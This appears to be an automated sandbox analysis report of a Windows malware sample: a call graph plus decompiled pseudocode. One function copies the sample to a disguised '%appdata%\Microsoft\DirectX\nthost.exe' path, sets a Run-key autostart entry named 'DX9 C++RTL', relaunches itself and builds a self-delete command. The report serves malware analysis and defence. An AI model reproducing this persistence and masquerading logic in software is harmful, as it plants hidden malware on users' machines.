13783->13720 13785 40a672 13784->13785 13786 405824 56 API calls 13785->13786 13787 40a69c 13786->13787 13794 407cec 13787->13794 13792 403eac 11 API calls 13793 40a6cf 13792->13793 13793->13783 13803 407d00 13794->13803 13797 403edc 13798 403ee0 13797->13798 13799 403ef0 13797->13799 13798->13799 13801 403f4c 25 API calls 13798->13801 13800 403f1e 13799->13800 13802 402690 11 API calls 13799->13802 13800->13792 13801->13799 13802->13800 13804 407d24 13803->13804 13807 407d4f 13804->13807 13816 407934 13804->13816 13806 407da7 13808 403f78 25 API calls 13806->13808 13807->13806 13814 407d64 13807->13814 13812 407cfb 13808->13812 13809 407d9d 13811 404478 25 API calls 13809->13811 13810 403e88 11 API calls 13810->13814 13811->13812 13812->13797 13813 404478 25 API calls 13813->13814 13814->13809 13814->13810 13814->13813 13815 407934 56 API calls 13814->13815 13815->13814 13822 40795d 13816->13822 13817 40796e 13835 407c8b 13817->13835 13820 407a16 11 API calls 13820->13822 13822->13817 13822->13820 13824 407a5e 13822->13824 13832 407928 13822->13832 13825 407ac9 13824->13825 13826 407a6f 13824->13826 13827 407c8b 11 API calls 13825->13827 13831 406fb0 13825->13831 13838 4078ac 13825->13838 13826->13825 13829 407b67 13826->13829 13827->13825 13829->13831 13842 407904 13829->13842 13831->13822 13833 403e88 11 API calls 13832->13833 13834 407932 13833->13834 13834->13822 13836 403e88 11 API calls 13835->13836 13837 407c98 13836->13837 13837->13807 13839 4078bd 13838->13839 13840 406d40 56 API calls 13839->13840 13841 4078fd 13840->13841 13841->13825 13843 40791c 13842->13843 13845 407910 13842->13845 13844 402778 11 API calls 13843->13844 13846 407923 13844->13846 13845->13831 13846->13831 13848 40434c ExpandEnvironmentStringsA 13847->13848 13848->13730 13850 40761f 13849->13850 13873 4043a8 13850->13873 13853 4074a0 13854 4074b5 13853->13854 13859 4074dd 13854->13859 13880 40a628 13854->13880 13884 40b13c 13859->13884 13860 407503 13861 407553 13860->13861 13893 40747c 13860->13893 13863 403eac 11 API calls 13861->13863 13864 407577 13863->13864 13864->13744 13867 407527 13867->13861 13868 4075d8 25 API calls 13867->13868 13869 40753f 13868->13869 13870 4074a0 58 API calls 13869->13870 13871 407547 13870->13871 13871->13861 13901 407748 13871->13901 13874 4043da 13873->13874 13877 4043ad 13873->13877 13875 403e88 11 API calls 13874->13875 13876 4043d0 13875->13876 13876->13853 13877->13874 13878 4043c1 13877->13878 13879 403f78 25 API calls 13878->13879 13879->13876 13881 40a62f 13880->13881 13882 405824 56 API calls 13881->13882 13883 40a647 13882->13883 13883->13859 13885 403edc 25 API calls 13884->13885 13886 40b14b 13885->13886 13887 4074f8 13886->13887 13888 404478 25 API calls 13886->13888 13889 403f20 13887->13889 13888->13887 13891 403f24 13889->13891 13890 403f48 13890->13860 13891->13890 13892 402690 11 API calls 13891->13892 13892->13890 13894 404348 13893->13894 13895 407486 GetFileAttributesA 13894->13895 13896 407491 13895->13896 13896->13861 13897 4075d8 13896->13897 13898 4075eb 13897->13898 13899 4043a8 25 API calls 13898->13899 13900 4075fc 13899->13900 13900->13867 13902 404348 13901->13902 13903 407754 CreateDirectoryA 13902->13903 13903->13861 13905 41782e 13904->13905 13929 417538 13905->13929 13907 417843 13907->13411 13909 417762 13908->13909 13910 41779b 13909->13910 13912 403edc 25 API calls 13909->13912 13911 403e88 11 API calls 13910->13911 13913 4177b0 13911->13913 13912->13910 13913->13416 13916 4177ce 13914->13916 13915 417807 13917 403e88 11 API calls 13915->13917 13916->13915 13918 403edc 25 API calls 13916->13918 13919 41781c 13917->13919 13918->13915 13919->13419 13921 403e88 11 API calls 13920->13921 13927 41734a 13921->13927 13923 4173fa 13924 403e88 11 API calls 13923->13924 13925 417412 13924->13925 13925->13424 13927->13923 14001 4172ac 726517A8 13927->14001 14003 4172d0 726517A8 13927->14003 14005 404150 13927->14005 13930 41753e 13929->13930 13941 417134 13930->13941 13932 417553 13933 403e88 11 API calls 13932->13933 13934 417565 13933->13934 13935 403e88 11 API calls 13934->13935 13936 41756d 13935->13936 13937 403e88 11 API calls 13936->13937 13938 417575 13937->13938 13939 403e88 11 API calls 13938->13939 13940 41757d 13939->13940 13940->13907 13942 41713a 13941->13942 13947 416120 13942->13947 13944 41714f 13951 40ba84 13944->13951 13946 4171a3 13946->13932 13948 416127 13947->13948 13950 41614a 13948->13950 13956 416284 13948->13956 13950->13944 13986 40ba10 13951->13986 13954 40ba9e 13954->13946 13957 416298 13956->13957 13959 4162ca 13957->13959 13960 416700 13957->13960 13959->13950 13962 416710 13960->13962 13961 416749 13961->13959 13962->13961 13964 416700 56 API calls 13962->13964 13965 4166c4 13962->13965 13964->13962 13966 4166e2 13965->13966 13967 4166d0 13965->13967 13978 4115c0 13966->13978 13971 41156c 13967->13971 13972 405824 56 API calls 13971->13972 13973 41158f 13972->13973 13982 411534 13973->13982 13979 4115ca 13978->13979 13980 4115de 13979->13980 13981 41156c 56 API calls 13979->13981 13980->13962 13981->13980 13983 411542 13982->13983 13984 40a5a8 56 API calls 13983->13984 13985 411561 13984->13985 13985->13985 13996 40b9a0 13986->13996 13988 40ba1a 13989 40ba60 FreeResource 13988->13989 13992 40ba74 13988->13992 13990 40ba6f 13989->13990 13989->13992 13991 40b988 56 API calls 13990->13991 13991->13992 13992->13954 13993 40b988 13992->13993 13994 40a628 56 API calls 13993->13994 13995 40b99a 13994->13995 13995->13954 13997 40b9ad FindResourceA LoadResource 13996->13997 14000 40b9d1 13996->14000 13998 40ba02 13997->13998 13998->13988 13999 40b9df FindResourceA LoadResource 13999->13998 13999->14000 14000->13998 14000->13999 14002 4172cb 14001->14002 14002->13927 14004 4172f5 14003->14004 14004->13927 14006 404193 14005->14006 14007 404154 14005->14007 14006->13927 14008 40415e 14007->14008 14009 403edc 14007->14009 14010 404188 14008->14010 14011 404171 14008->14011 14015 403f4c 25 API calls 14009->14015 14016 403ef0 14009->14016 14012 404478 25 API calls 14010->14012 14013 404478 25 API calls 14011->14013 14018 404176 14012->14018 14013->14018 14014 403f1e 14014->13927 14015->14016 14016->14014 14017 402690 11 API calls 14016->14017 14017->14014 14018->13927 14020 402670 25 API calls 14019->14020 14021 403e5a CreateThread 14020->14021 14021->13430 14022 403e0c 14021->14022 14023 403e14 14022->14023 14024 402690 11 API calls 14023->14024 14025 403e32 14024->14025 14027 4183ac 14026->14027 14032 418240 14027->14032 14030 403e88 11 API calls 14031 4183dc 14030->14031 14031->13325 14033 41827a 14032->14033 14050 406d84 14033->14050 14039 418358 CloseHandle 14040 41836b 14039->14040 14041 403eac 11 API calls 14040->14041 14043 41837b 14041->14043 14044 403eac 11 API calls 14043->14044 14045 418388 14044->14045 14045->14030 14046 41833c 14046->14039 14047 4182b8 14047->14039 14047->14046 14048 406d84 25 API calls 14047->14048 14060 407660 14047->14060 14064 417d2c 14047->14064 14048->14047 14051 406d92 14050->14051 14052 404478 25 API calls 14051->14052 14053 406d9d 14052->14053 14054 417cec 14053->14054 14067 417a70 14054->14067 14057 417d0c 14058 417a70 17 API calls 14057->14058 14059 417d17 14058->14059 14059->14047 14061 407673 14060->14061 14062 4043a8 25 API calls 14061->14062 14063 407685 14062->14063 14063->14047 14065 417a70 17 API calls 14064->14065 14066 417d37 14065->14066 14066->14047 14068 417a7f GetModuleHandleA 14067->14068 14070 417bb4 14067->14070 14069 417a94 16 API calls 14068->14069 14068->14070 14069->14070 14070->14057 14074 4183ec 14071->14074 14073 41856a 14073->13444 14073->13445 14075 417cec 17 API calls 14074->14075 14076 418405 14075->14076 14077 417d0c 17 API calls 14076->14077 14078 418417 14077->14078 14079 41843c CloseHandle 14078->14079 14080 418425 14078->14080 14081 417d2c 17 API calls 14078->14081 14079->14073 14080->14079 14081->14078 14082 417974 WSAStartup 14083 417987 14082->14083 14085 417998 14082->14085 14086 40a56c 14083->14086 14087 40a573 14086->14087 14088 403edc 25 API calls 14087->14088 14089 40a58b 14088->14089 14089->14085

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
